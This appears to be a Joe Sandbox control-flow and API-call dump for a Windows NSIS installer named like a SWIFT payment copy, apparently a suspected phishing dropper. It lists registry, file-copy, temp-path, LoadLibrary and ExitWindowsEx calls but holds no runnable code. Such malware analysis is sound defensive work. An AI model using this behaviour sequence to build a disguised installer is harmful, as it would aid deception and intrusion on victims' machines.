3619 40228b WritePrivateProfileStringA 3617->3619 3618->3616 3620 4014d6 3621 402a0c 18 API calls 3620->3621 3622 4014dc Sleep 3621->3622 3624 4028be 3622->3624 3625 4035d8 3626 4035e3 3625->3626 3627 4035e7 3626->3627 3628 4035ea GlobalAlloc 3626->3628 3628->3627 3629 40245a 3639 402b33 3629->3639 3631 402464 3632 402a0c 18 API calls 3631->3632 3633 40246d 3632->3633 3634 402490 RegEnumValueA 3633->3634 3635 402484 RegEnumKeyA 3633->3635 3636 40268f 3633->3636 3634->3636 3637 4024a9 RegCloseKey 3634->3637 3635->3637 3637->3636 3640 402a29 18 API calls 3639->3640 3641 402b4c 3640->3641 3642 402b5a RegOpenKeyExA 3641->3642 3642->3631 3643 4022da 3644 40230a 3643->3644 3645 4022df 3643->3645 3646 402a29 18 API calls 3644->3646 3647 402b33 19 API calls 3645->3647 3648 402311 3646->3648 3649 4022e6 3647->3649 3654 402a69 RegOpenKeyExA 3648->3654 3650 402a29 18 API calls 3649->3650 3653 402327 3649->3653 3652 4022f7 RegDeleteValueA RegCloseKey 3650->3652 3652->3653 3661 402a94 3654->3661 3663 402ae0 3654->3663 3655 402aba RegEnumKeyA 3656 402acc RegCloseKey 3655->3656 3655->3661 3658 405f57 5 API calls 3656->3658 3657 402af1 RegCloseKey 3657->3663 3660 402adc 3658->3660 3659 402a69 5 API calls 3659->3661 3662 402b0c RegDeleteKeyA 3660->3662 3660->3663 3661->3655 3661->3656 3661->3657 3661->3659 3662->3663 3663->3653 3664 40155b 3665 402866 3664->3665 3668 405b25 wsprintfA 3665->3668 3667 40286b 3668->3667 3669 401cde GetDlgItem GetClientRect 3670 402a29 18 API calls 3669->3670 3671 401d0e LoadImageA SendMessageA 3670->3671 3672 401d2c DeleteObject 3671->3672 3673 4028be 3671->3673 3672->3673 3674 401dde 3675 402a29 18 API calls 3674->3675 3676 401de4 3675->3676 3677 402a29 18 API calls 3676->3677 3678 401ded 3677->3678 3679 402a29 18 API calls 3678->3679 3680 401df6 3679->3680 3681 402a29 18 API calls 3680->3681 3682 401dff 3681->3682 3683 401423 25 API calls 3682->3683 3684 401e06 ShellExecuteA 3683->3684 3685 401e33 3684->3685 3686 401662 3687 402a29 18 API calls 
3686->3687 3688 401669 3687->3688 3689 402a29 18 API calls 3688->3689 3690 401672 3689->3690 3691 402a29 18 API calls 3690->3691 3692 40167b MoveFileA 3691->3692 3693 40168e 3692->3693 3699 401687 3692->3699 3695 405ec2 2 API calls 3693->3695 3697 40219c 3693->3697 3694 401423 25 API calls 3694->3697 3696 40169d 3695->3696 3696->3697 3698 405915 40 API calls 3696->3698 3698->3699 3699->3694 3700 401ee2 3701 402a29 18 API calls 3700->3701 3702 401ee9 3701->3702 3703 405f57 5 API calls 3702->3703 3704 401ef8 3703->3704 3705 401f10 GlobalAlloc 3704->3705 3706 401f78 3704->3706 3705->3706 3707 401f24 3705->3707 3708 405f57 5 API calls 3707->3708 3709 401f2b 3708->3709 3710 405f57 5 API calls 3709->3710 3711 401f35 3710->3711 3711->3706 3715 405b25 wsprintfA 3711->3715 3713 401f6c 3716 405b25 wsprintfA 3713->3716 3715->3713 3716->3706 3717 4023e2 3718 402b33 19 API calls 3717->3718 3719 4023ec 3718->3719 3720 402a29 18 API calls 3719->3720 3721 4023f5 3720->3721 3722 4023ff RegQueryValueExA 3721->3722 3725 40268f 3721->3725 3723 402425 RegCloseKey 3722->3723 3724 40241f 3722->3724 3723->3725 3724->3723 3728 405b25 wsprintfA 3724->3728 3728->3723 3729 401567 3730 401577 ShowWindow 3729->3730 3731 40157e 3729->3731 3730->3731 3732 40158c ShowWindow 3731->3732 3733 4028be 3731->3733 3732->3733 3734 402b6e 3735 402b96 3734->3735 3736 402b7d SetTimer 3734->3736 3737 402beb 3735->3737 3738 402bb0 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3735->3738 3736->3735 3738->3737 3739 4014f0 SetForegroundWindow 3740 4028be 3739->3740 3741 402671 3742 402a29 18 API calls 3741->3742 3743 402678 FindFirstFileA 3742->3743 3744 40269b 3743->3744 3748 40268b 3743->3748 3745 4026a2 3744->3745 3749 405b25 wsprintfA 3744->3749 3750 405bc7 lstrcpynA 3745->3750 3749->3745 3750->3748 3751 404ff1 3752 405012 GetDlgItem GetDlgItem GetDlgItem 3751->3752 3753 40519d 3751->3753 3797 403eb8 SendMessageA 3752->3797 3755 4051a6 GetDlgItem CreateThread CloseHandle 3753->3755 3756 4051ce 3753->3756 
3755->3756 3758 4051f9 3756->3758 3759 4051e5 ShowWindow ShowWindow 3756->3759 3760 40521b 3756->3760 3757 405083 3765 40508a GetClientRect GetSystemMetrics SendMessageA SendMessageA 3757->3765 3761 405257 3758->3761 3762 405230 ShowWindow 3758->3762 3763 40520a 3758->3763 3799 403eb8 SendMessageA 3759->3799 3764 403eea 8 API calls 3760->3764 3761->3760 3772 405262 SendMessageA 3761->3772 3768 405250 3762->3768 3769 405242 3762->3769 3767 403e5c SendMessageA 3763->3767 3778 405229 3764->3778 3770 4050f9 3765->3770 3771 4050dd SendMessageA SendMessageA 3765->3771 3767->3760 3774 403e5c SendMessageA 3768->3774 3773 404eb3 25 API calls 3769->3773 3775 40510c 3770->3775 3776 4050fe SendMessageA 3770->3776 3771->3770 3777 40527b CreatePopupMenu 3772->3777 3772->3778 3773->3768 3774->3761 3780 403e83 19 API calls 3775->3780 3776->3775 3779 405be9 18 API calls 3777->3779 3782 40528b AppendMenuA 3779->3782 3781 40511c 3780->3781 3785 405125 ShowWindow 3781->3785 3786 405159 GetDlgItem SendMessageA 3781->3786 3783 4052b1 3782->3783 3784 40529e GetWindowRect 3782->3784 3787 4052ba TrackPopupMenu 3783->3787 3784->3787 3788 405148 3785->3788 3789 40513b ShowWindow 3785->3789 3786->3778 3790 405180 SendMessageA SendMessageA 3786->3790 3787->3778 3791 4052d8 3787->3791 3798 403eb8 SendMessageA 3788->3798 3789->3788 3790->3778 3792 4052f4 SendMessageA 3791->3792 3792->3792 3794 405311 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3792->3794 3795 405333 SendMessageA 3794->3795 3795->3795 3796 405354 GlobalUnlock SetClipboardData CloseClipboard 3795->3796 3796->3778 3797->3757 3798->3786 3799->3758 3800 4024f1 3801 4024f6 3800->3801 3802 402507 3800->3802 3803 402a0c 18 API calls 3801->3803 3804 402a29 18 API calls 3802->3804 3806 4024fd 3803->3806 3805 40250e lstrlenA 3804->3805 3805->3806 3807 40252d WriteFile 3806->3807 3808 40268f 3806->3808 3807->3808 3814 4018f5 3815 40192c 3814->3815 3816 402a29 18 API calls 3815->3816 3817 401931 3816->3817 3818 4054ec 70 API calls 
3817->3818 3819 40193a 3818->3819 3820 4018f8 3821 402a29 18 API calls 3820->3821 3822 4018ff 3821->3822 3823 405488 MessageBoxIndirectA 3822->3823 3824 401908 3823->3824 3825 40427a 3826 4042b0 3825->3826 3827 40428a 3825->3827 3829 403eea 8 API calls 3826->3829 3828 403e83 19 API calls 3827->3828 3830 404297 SetDlgItemTextA 3828->3830 3831 4042bc 3829->3831 3830->3826 3832 4014fe 3833 401506 3832->3833 3835 401519 3832->3835 3834 402a0c 18 API calls 3833->3834 3834->3835 3836 4025ff 3837 402606 3836->3837 3838 40286b 3836->3838 3839 402a0c 18 API calls 3837->3839 3840 402611 3839->3840 3841 402618 SetFilePointer 3840->3841 3841->3838 3842 402628 3841->3842 3844 405b25 wsprintfA 3842->3844 3844->3838 3845 401000 3846 401037 BeginPaint GetClientRect 3845->3846 3847 40100c DefWindowProcA 3845->3847 3848 4010f3 3846->3848 3850 401179 3847->3850 3851 401073 CreateBrushIndirect FillRect DeleteObject 3848->3851 3852 4010fc 3848->3852 3851->3848 3853 401102 CreateFontIndirectA 3852->3853 3854 401167 EndPaint 3852->3854 3853->3854 3855 401112 6 API calls 3853->3855 3854->3850 3855->3854 3856 404802 GetDlgItem GetDlgItem 3857 404856 7 API calls 3856->3857 3863 404a73 3856->3863 3858 4048fc DeleteObject 3857->3858 3859 4048ef SendMessageA 3857->3859 3860 404907 3858->3860 3859->3858 3861 40493e 3860->3861 3862 405be9 18 API calls 3860->3862 3864 403e83 19 API calls 3861->3864 3866 404920 SendMessageA SendMessageA 3862->3866 3869 404b5d 3863->3869 3889 404ae7 3863->3889 3909 404782 SendMessageA 3863->3909 3868 404952 3864->3868 3865 404c0c 3867 404c15 SendMessageA 3865->3867 3872 404c21 3865->3872 3866->3860 3867->3872 3874 403e83 19 API calls 3868->3874 3869->3865 3875 404bb6 SendMessageA 3869->3875 3899 404a66 3869->3899 3870 403eea 8 API calls 3876 404dfc 3870->3876 3871 404b4f SendMessageA 3871->3869 3877 404c33 ImageList_Destroy 3872->3877 3878 404c3a 3872->3878 3884 404c4a 3872->3884 3890 404960 3874->3890 3880 404bcb SendMessageA 3875->3880 3875->3899 3877->3878 3882 
404c43 GlobalFree 3878->3882 3878->3884 3879 404db0 3885 404dc2 ShowWindow GetDlgItem ShowWindow 3879->3885 3879->3899 3881 404bde 3880->3881 3893 404bef SendMessageA 3881->3893 3882->3884 3883 404a34 GetWindowLongA SetWindowLongA 3886 404a4d 3883->3886 3884->3879 3892 40140b 2 API calls 3884->3892 3903 404c7c 3884->3903 3885->3899 3887 404a53 ShowWindow 3886->3887 3888 404a6b 3886->3888 3907 403eb8 SendMessageA 3887->3907 3908 403eb8 SendMessageA 3888->3908 3889->3869 3889->3871 3890->3883 3891 4049af SendMessageA 3890->3891 3894 404a2e 3890->3894 3897 4049eb SendMessageA 3890->3897 3898 4049fc SendMessageA 3890->3898 3891->3890 3892->3903 3893->3865 3894->3883 3894->3886 3897->3890 3898->3890 3899->3870 3900 404d86 InvalidateRect 3900->3879 3901 404d9c 3900->3901 3904 40473d 21 API calls 3901->3904 3902 404caa SendMessageA 3906 404cc0 3902->3906 3903->3902 3903->3906 3904->3879 3905 404d34 SendMessageA SendMessageA 3905->3906 3906->3900 3906->3905 3907->3899 3908->3863 3910 4047e1 SendMessageA 3909->3910 3911 4047a5 GetMessagePos ScreenToClient SendMessageA 3909->3911 3912 4047d9 3910->3912 3911->3912 3913 4047de 3911->3913 3912->3889 3913->3910 3914 401b02 3915 402a29 18 API calls 3914->3915 3916 401b09 3915->3916 3917 402a0c 18 API calls 3916->3917 3918 401b12 wsprintfA 3917->3918 3919 4028be 3918->3919 3920 404e03 3921 404e11 3920->3921 3922 404e28 3920->3922 3924 404e91 3921->3924 3925 404e17 3921->3925 3923 404e36 IsWindowVisible 3922->3923 3931 404e4d 3922->3931 3923->3924 3926 404e43 3923->3926 3927 404e97 CallWindowProcA 3924->3927 3928 403ecf SendMessageA 3925->3928 3929 404782 5 API calls 3926->3929 3930 404e21 3927->3930 3928->3930 3929->3931 3931->3927 3939 405bc7 lstrcpynA 3931->3939 3933 404e7c 3940 405b25 wsprintfA 3933->3940 3935 404e83 3936 40140b 2 API calls 3935->3936 3937 404e8a 3936->3937 3941 405bc7 lstrcpynA 3937->3941 3939->3933 3940->3935 3941->3924 3942 401a03 3943 402a29 18 API calls 3942->3943 3944 401a0c ExpandEnvironmentStringsA 
3943->3944 3945 401a20 3944->3945 3946 401a33 3944->3946 3945->3946 3947 401a25 lstrcmpA 3945->3947 3947->3946 3948 401f84 3949 401f96 3948->3949 3950 402045 3948->3950 3951 402a29 18 API calls 3949->3951 3952 401423 25 API calls 3950->3952 3953 401f9d 3951->3953 3958 40219c 3952->3958 3954 402a29 18 API calls 3953->3954 3955 401fa6 3954->3955 3956 401fbb LoadLibraryExA 3955->3956 3957 401fae GetModuleHandleA 3955->3957 3956->3950 3959 401fcb GetProcAddress 3956->3959 3957->3956 3957->3959 3960 402018 3959->3960 3961 401fdb 3959->3961 3962 404eb3 25 API calls 3960->3962 3963 401423 25 API calls 3961->3963 3964 401feb 3961->3964 3962->3964 3963->3964 3964->3958 3965 402039 FreeLibrary 3964->3965 3965->3958 3966 401c8a 3967 402a0c 18 API calls 3966->3967 3968 401c90 IsWindow 3967->3968 3969 4019f3 3968->3969 3970 401490 3971 404eb3 25 API calls 3970->3971 3972 401497 3971->3972 3973 404612 3974 404622 3973->3974 3975 40463e 3973->3975 3984 40546c GetDlgItemTextA 3974->3984 3977 404671 3975->3977 3978 404644 SHGetPathFromIDListA 3975->3978 3979 40465b SendMessageA 3978->3979 3980 404654 3978->3980 3979->3977 3982 40140b 2 API calls 3980->3982 3981 40462f SendMessageA 3981->3975 3982->3979 3984->3981 3985 401595 3986 402a29 18 API calls 3985->3986 3987 40159c SetFileAttributesA 3986->3987 3988 4015ae 3987->3988 3989 401717 3990 402a29 18 API calls 3989->3990 3991 40171e SearchPathA 3990->3991 3992 401739 3991->3992 3993 403f97 lstrcpynA lstrlenA 3994 402899 SendMessageA 3995 4028b3 InvalidateRect 3994->3995 3996 4028be 3994->3996 3995->3996 3997 40229a 3998 402a29 18 API calls 3997->3998 3999 4022a8 3998->3999 4000 402a29 18 API calls 3999->4000 4001 4022b1 4000->4001 4002 402a29 18 API calls 4001->4002 4003 4022bb GetPrivateProfileStringA 4002->4003 4004 40149d 4005 402241 4004->4005 4006 4014ab PostQuitMessage 4004->4006 4006->4005 4007 401b23 4008 401b30 4007->4008 4009 401b74 4007->4009 4012 40222e 4008->4012 4015 401b47 4008->4015 4010 401b78 4009->4010 4011 
401b9d GlobalAlloc 4009->4011 4022 401bb8 4010->4022 4028 405bc7 lstrcpynA 4010->4028 4013 405be9 18 API calls 4011->4013 4014 405be9 18 API calls 4012->4014 4013->4022 4017 40223b 4014->4017 4026 405bc7 lstrcpynA 4015->4026 4020 405488 MessageBoxIndirectA 4017->4020 4019 401b8a GlobalFree 4019->4022 4020->4022 4021 401b56 4027 405bc7 lstrcpynA 4021->4027 4024 401b65 4029 405bc7 lstrcpynA 4024->4029 4026->4021 4027->4024 4028->4019 4029->4022 4030 4021a5 4031 402a29 18 API calls 4030->4031 4032 4021ab 4031->4032 4033 402a29 18 API calls 4032->4033 4034 4021b4 4033->4034 4035 402a29 18 API calls 4034->4035 4036 4021bd 4035->4036 4037 405ec2 2 API calls 4036->4037 4038 4021c6 4037->4038 4039 4021d7 lstrlenA lstrlenA 4038->4039 4040 4021ca 4038->4040 4042 404eb3 25 API calls 4039->4042 4041 404eb3 25 API calls 4040->4041 4043 4021d2 4040->4043 4041->4043 4044 402213 SHFileOperationA 4042->4044 4044->4040 4044->4043 4045 402227 4046 40222e 4045->4046 4048 402241 4045->4048 4047 405be9 18 API calls 4046->4047 4049 40223b 4047->4049 4050 405488 MessageBoxIndirectA 4049->4050 4050->4048 4051 401ca7 4052 402a0c 18 API calls 4051->4052 4053 401cae 4052->4053 4054 402a0c 18 API calls 4053->4054 4055 401cb6 GetDlgItem 4054->4055 4056 4024eb 4055->4056 3160 40312a SetErrorMode GetVersion 3161 403162 3160->3161 3162 403168 3160->3162 3163 405f57 5 API calls 3161->3163 3164 405ee9 3 API calls 3162->3164 3163->3162 3165 40317e lstrlenA 3164->3165 3165->3162 3166 40318d 3165->3166 3167 405f57 5 API calls 3166->3167 3168 403194 3167->3168 3169 405f57 5 API calls 3168->3169 3170 40319b #17 OleInitialize SHGetFileInfoA 3169->3170 3250 405bc7 lstrcpynA 3170->3250 3172 4031d8 GetCommandLineA 3251 405bc7 lstrcpynA 3172->3251 3174 4031ea GetModuleHandleA 3175 403201 3174->3175 3176 4056e5 CharNextA 3175->3176 3177 403215 CharNextA 3176->3177 3183 403222 3177->3183 3178 40328f 3179 4032a2 GetTempPathA 3178->3179 3252 4030f9 3179->3252 3181 4032b8 3184 4032e0 DeleteFileA 3181->3184 3185 
4032bc GetWindowsDirectoryA lstrcatA 3181->3185 3182 4056e5 CharNextA 3182->3183 3183->3178 3183->3182 3189 403291 3183->3189 3262 402c55 GetTickCount GetModuleFileNameA 3184->3262 3186 4030f9 12 API calls 3185->3186 3188 4032d8 3186->3188 3188->3184 3191 403361 ExitProcess OleUninitialize 3188->3191 3346 405bc7 lstrcpynA 3189->3346 3190 4032f4 3190->3191 3193 40334d 3190->3193 3197 4056e5 CharNextA 3190->3197 3194 403485 3191->3194 3195 403376 3191->3195 3290 40361a 3193->3290 3199 403528 ExitProcess 3194->3199 3204 405f57 5 API calls 3194->3204 3198 405488 MessageBoxIndirectA 3195->3198 3201 40330b 3197->3201 3203 403384 ExitProcess 3198->3203 3200 40335d 3200->3191 3208 403328 3201->3208 3209 40338c 3201->3209 3205 403498 3204->3205 3206 405f57 5 API calls 3205->3206 3207 4034a1 3206->3207 3210 405f57 5 API calls 3207->3210 3212 40579b 18 API calls 3208->3212 3211 40540f 5 API calls 3209->3211 3213 4034aa 3210->3213 3214 403391 lstrcatA 3211->3214 3215 403333 3212->3215 3216 4034c8 3213->3216 3226 4034b8 GetCurrentProcess 3213->3226 3217 4033a2 lstrcatA 3214->3217 3218 4033ad lstrcatA lstrcmpiA 3214->3218 3215->3191 3347 405bc7 lstrcpynA 3215->3347 3221 405f57 5 API calls 3216->3221 3217->3218 3218->3191 3220 4033c9 3218->3220 3224 4033d5 3220->3224 3225 4033ce 3220->3225 3222 4034ff 3221->3222 3227 403514 ExitWindowsEx 3222->3227 3232 403521 3222->3232 3223 403342 3348 405bc7 lstrcpynA 3223->3348 3230 4053f2 2 API calls 3224->3230 3229 405375 4 API calls 3225->3229 3226->3216 3227->3199 3227->3232 3231 4033d3 3229->3231 3233 4033da SetCurrentDirectoryA 3230->3233 3231->3233 3234 40140b 2 API calls 3232->3234 3235 4033f4 3233->3235 3236 4033e9 3233->3236 3234->3199 3350 405bc7 lstrcpynA 3235->3350 3349 405bc7 lstrcpynA 3236->3349 3239 405be9 18 API calls 3240 403424 DeleteFileA 3239->3240 3241 403431 CopyFileA 3240->3241 3247 403402 3240->3247 3241->3247 3242 403479 3244 405915 40 API calls 3242->3244 3243 405915 40 API calls 3243->3247 3245 403480 3244->3245 
3245->3191 3246 405be9 18 API calls 3246->3247 3247->3239 3247->3242 3247->3243 3247->3246 3248 405427 2 API calls 3247->3248 3249 403465 CloseHandle 3247->3249 3248->3247 3249->3247 3250->3172 3251->3174 3253 405e29 5 API calls 3252->3253 3254 403105 3253->3254 3255 40310f 3254->3255 3256 4056ba 3 API calls 3254->3256 3255->3181 3257 403117 3256->3257 3258 4053f2 2 API calls 3257->3258 3259 40311d 3258->3259 3351 4058cd 3259->3351 3355 40589e GetFileAttributesA CreateFileA 3262->3355 3264 402c95 3282 402ca5 3264->3282 3356 405bc7 lstrcpynA 3264->3356 3266 402cbb 3267 405701 2 API calls 3266->3267 3268 402cc1 3267->3268 3357 405bc7 lstrcpynA 3268->3357 3270 402ccc GetFileSize 3271 402dc8 3270->3271 3284 402ce3 3270->3284 3358 402bf1 3271->3358 3273 402dd1 3275 402e01 GlobalAlloc 3273->3275 3273->3282 3369 4030e2 SetFilePointer 3273->3369 3274 4030b0 ReadFile 3274->3284 3370 4030e2 SetFilePointer 3275->3370 3277 402e34 3279 402bf1 6 API calls 3277->3279 3279->3282 3280 402dea 3283 4030b0 ReadFile 3280->3283 3281 402e1c 3285 402e8e 33 API calls 3281->3285 3282->3190 3286 402df5 3283->3286 3284->3271 3284->3274 3284->3277 3284->3282 3287 402bf1 6 API calls 3284->3287 3288 402e28 3285->3288 3286->3275 3286->3282 3287->3284 3288->3282 3288->3288 3289 402e65 SetFilePointer 3288->3289 3289->3282 3291 405f57 5 API calls 3290->3291 3292 40362e 3291->3292 3293 403634 3292->3293 3294 403646 3292->3294 3380 405b25 wsprintfA 3293->3380 3295 405aae 3 API calls 3294->3295 3296 403667 3295->3296 3298 403685 lstrcatA 3296->3298 3300 405aae 3 API calls 3296->3300 3299 403644 3298->3299 3371 4038e3 3299->3371 3300->3298 3303 40579b 18 API calls 3304 4036b7 3303->3304 3305 403740 3304->3305 3307 405aae 3 API calls 3304->3307 3306 40579b 18 API calls 3305->3306 3308 403746 3306->3308 3309 4036e3 3307->3309 3310 403756 LoadImageA 3308->3310 3311 405be9 18 API calls 3308->3311 3309->3305 3314 4036ff lstrlenA 3309->3314 3318 4056e5 CharNextA 3309->3318 3312 403781 RegisterClassA 
3310->3312 3313 40380a 3310->3313 3311->3310 3315 403814 3312->3315 3316 4037bd SystemParametersInfoA CreateWindowExA 3312->3316 3317 40140b 2 API calls 3313->3317 3319 403733 3314->3319 3320 40370d lstrcmpiA 3314->3320 3315->3200 3316->3313 3321 403810 3317->3321 3322 4036fd 3318->3322 3324 4056ba 3 API calls 3319->3324 3320->3319 3323 40371d GetFileAttributesA 3320->3323 3321->3315 3326 4038e3 19 API calls 3321->3326 3322->3314 3325 403729 3323->3325 3327 403739 3324->3327 3325->3319 3328 405701 2 API calls 3325->3328 3329 403821 3326->3329 3381 405bc7 lstrcpynA 3327->3381 3328->3319 3331 4038b0 3329->3331 3332 40382d ShowWindow 3329->3332 3382 404f85 OleInitialize 3331->3382 3333 405ee9 3 API calls 3332->3333 3335 403845 3333->3335 3337 403853 GetClassInfoA 3335->3337 3340 405ee9 3 API calls 3335->3340 3336 4038b6 3338 4038d2 3336->3338 3339 4038ba 3336->3339 3342 403867 GetClassInfoA RegisterClassA 3337->3342 3343 40387d DialogBoxParamA 3337->3343 3341 40140b 2 API calls 3338->3341 3339->3315 3344 40140b 2 API calls 3339->3344 3340->3337 3341->3315 3342->3343 3345 40140b 2 API calls 3343->3345 3344->3315 3345->3315 3346->3179 3347->3223 3348->3193 3349->3235 3350->3247 3352 4058d8 GetTickCount GetTempFileNameA 3351->3352 3353 405904 3352->3353 3354 403128 3352->3354 3353->3352 3353->3354 3354->3181 3355->3264 3356->3266 3357->3270 3359 402c12 3358->3359 3360 402bfa 3358->3360 3363 402c22 GetTickCount 3359->3363 3364 402c1a 3359->3364 3361 402c03 DestroyWindow 3360->3361 3362 402c0a 3360->3362 3361->3362 3362->3273 3366 402c30 CreateDialogParamA ShowWindow 3363->3366 3367 402c53 3363->3367 3365 405f93 2 API calls 3364->3365 3368 402c20 3365->3368 3366->3367 3367->3273 3368->3273 3369->3280 3370->3281 3372 4038f7 3371->3372 3389 405b25 wsprintfA 3372->3389 3374 403968 3375 405be9 18 API calls 3374->3375 3376 403974 SetWindowTextA 3375->3376 3377 403990 3376->3377 3378 403695 3376->3378 3377->3378 3379 405be9 18 API calls 3377->3379 3378->3303 3379->3377 
3380->3299 3381->3305 3383 403ecf SendMessageA 3382->3383 3387 404fa8 3383->3387 3384 404fcf 3385 403ecf SendMessageA 3384->3385 3386 404fe1 OleUninitialize 3385->3386 3386->3336 3387->3384 3388 401389 2 API calls 3387->3388 3388->3387 3389->3374 4057 40262e 4058 402635 4057->4058 4060 4028be 4057->4060 4059 40263b FindClose 4058->4059 4059->4060 4061 4026af 4062 402a29 18 API calls 4061->4062 4064 4026bd 4062->4064 4063 4026d3 4066 40587f 2 API calls 4063->4066 4064->4063 4065 402a29 18 API calls 4064->4065 4065->4063 4067 4026d9 4066->4067 4087 40589e GetFileAttributesA CreateFileA 4067->4087 4069 4026e6 4070 4026f2 GlobalAlloc 4069->4070 4071 40278f 4069->4071 4072 402786 CloseHandle 4070->4072 4073 40270b 4070->4073 4074 402797 DeleteFileA 4071->4074 4075 4027aa 4071->4075 4072->4071 4088 4030e2 SetFilePointer 4073->4088 4074->4075 4077 402711 4078 4030b0 ReadFile 4077->4078 4079 40271a GlobalAlloc 4078->4079 4080 40272a 4079->4080 4081 40275e WriteFile GlobalFree 4079->4081 4083 402e8e 33 API calls 4080->4083 4082 402e8e 33 API calls 4081->4082 4084 402783 4082->4084 4086 402737 4083->4086 4084->4072 4085 402755 GlobalFree 4085->4081 4086->4085 4087->4069 4088->4077 2921 4039b0 2922 403b03 2921->2922 2923 4039c8 2921->2923 2925 403b54 2922->2925 2926 403b14 GetDlgItem GetDlgItem 2922->2926 2923->2922 2924 4039d4 2923->2924 2927 4039f2 2924->2927 2928 4039df SetWindowPos 2924->2928 2930 403bae 2925->2930 3020 401389 2925->3020 3017 403e83 2926->3017 2932 4039f7 ShowWindow 2927->2932 2933 403a0f 2927->2933 2928->2927 2935 403afe 2930->2935 2994 403ecf 2930->2994 2932->2933 2936 403a31 2933->2936 2937 403a17 DestroyWindow 2933->2937 2934 403b3e SetClassLongA 2938 40140b 2 API calls 2934->2938 2941 403a36 SetWindowLongA 2936->2941 2942 403a47 2936->2942 2940 403e2d 2937->2940 2938->2925 2940->2935 2950 403e3d ShowWindow 2940->2950 2941->2935 2946 403af0 2942->2946 2947 403a53 GetDlgItem 2942->2947 2944 40140b 2 API calls 2951 403bc0 2944->2951 2945 403e0e 

                                                                                                                        Control-flow Graph: first block 40312a-403160
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE ref: 00403150
                                                                                                                        • GetVersion.KERNEL32 ref: 00403156
                                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                                                                                        • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004031A7
                                                                                                                        • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                                                                                        • GetCommandLineA.KERNEL32(pkfcbfzkpkrqtkjcmcyn Setup,NSIS Error), ref: 004031D8
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000), ref: 004031EB
                                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00409168), ref: 00403216
                                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                                                                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                        • ExitProcess.KERNEL32(00000020), ref: 00403361
                                                                                                                        • OleUninitialize.OLE32(00000020), ref: 00403366
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403386
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000,00000020), ref: 00403399
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000,00000020), ref: 004033A8
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000,00000020), ref: 004033B3
                                                                                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033BF
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                                                        • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,00428C58,00000001), ref: 00403439
                                                                                                                        • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040353A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
